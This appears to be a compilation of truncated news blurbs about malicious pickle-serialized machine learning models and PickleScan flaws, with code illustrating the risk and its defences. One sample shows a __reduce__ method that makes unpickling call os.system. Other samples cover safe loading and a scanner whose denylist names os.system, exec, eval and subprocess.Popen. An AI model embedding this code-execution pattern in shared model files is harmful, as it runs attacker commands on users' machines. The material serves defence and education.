Researchers have devised a new way of manipulating machine learning (ML) models by injecting malicious code into the serialization process. The method focuses on the "pickling" process used to ...
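The attack surface here is Python's pickle protocol itself: an object's `__reduce__` method tells the unpickler which callable to invoke to "reconstruct" the object, so simply deserializing an attacker-supplied file is enough to run code. Below is a minimal sketch of that classic trick, using a harmless `echo` as a stand-in payload; the class name and command are illustrative, not taken from the research described above.

```python
import pickle


class MaliciousPayload:
    """Illustrative only: __reduce__ tells pickle how to rebuild this
    object, and the unpickler calls whatever callable we return here."""

    def __reduce__(self):
        import os
        # (callable, args) -- executed during unpickling.
        return (os.system, ("echo payload executed",))


# Serializing the object embeds the os.system call in the pickle stream.
blob = pickle.dumps(MaliciousPayload())

# Anyone who later unpickles the blob runs the command during
# deserialization -- no attribute access or method call required.
pickle.loads(blob)
```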
Researchers have discovered about 100 machine learning (ML) models uploaded to the Hugging Face artificial intelligence (AI) platform that could enable attackers to inject ...
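Because the risk comes from deserialization, the usual mitigation is to load downloaded weights with code execution disabled. The sketch below assumes the checkpoint ships either as a pickled file or in the safetensors format; the file names are placeholders, not models referenced in these reports.

```python
import torch
from safetensors.torch import load_file

# weights_only=True restricts torch.load to plain tensors and primitive
# containers, rejecting pickled objects that would invoke arbitrary callables.
state_dict = torch.load("model.bin", map_location="cpu", weights_only=True)

# Alternatively, avoid pickle entirely by distributing weights as safetensors,
# a flat tensor format with no embedded code paths.
state_dict = load_file("model.safetensors", device="cpu")
```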
Three critical zero-day vulnerabilities affecting PickleScan, a widely used tool for scanning Python pickle files and PyTorch models, have been uncovered by cybersecurity researchers. The flaws, all ...
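Scanners in this class generally work by statically walking the pickle opcode stream and flagging imports of dangerous callables, without ever unpickling the file. The following is a minimal sketch of that idea; the `SUSPICIOUS` denylist and `scan()` helper are illustrative and are not PickleScan's actual implementation.

```python
import pickletools
import sys

# Module/name pairs that should never appear in a model checkpoint.
SUSPICIOUS = {
    ("os", "system"),
    ("builtins", "exec"),
    ("builtins", "eval"),
    ("subprocess", "Popen"),
}


def scan(path: str) -> list[str]:
    """Walk the pickle opcode stream without executing it and flag
    GLOBAL/INST references to known-dangerous callables. (Real scanners
    also resolve protocol-4 STACK_GLOBAL imports from the stack.)"""
    findings = []
    with open(path, "rb") as f:
        data = f.read()
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST") and isinstance(arg, str):
            module, _, name = arg.partition(" ")
            if (module, name) in SUSPICIOUS:
                findings.append(f"{module}.{name}")
    return findings


if __name__ == "__main__":
    hits = scan(sys.argv[1])
    print("dangerous imports:", ", ".join(hits) or "none")
```

Denylist-based opcode scanning is also why bypasses keep appearing: any dangerous callable or encoding trick the scanner does not recognize slips through, which is the general pattern behind flaws like the ones reported here.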
IT researchers have discovered maliciously manipulated ML models on the Hugging Face AI development platform. Attackers could use them to inject commands. ...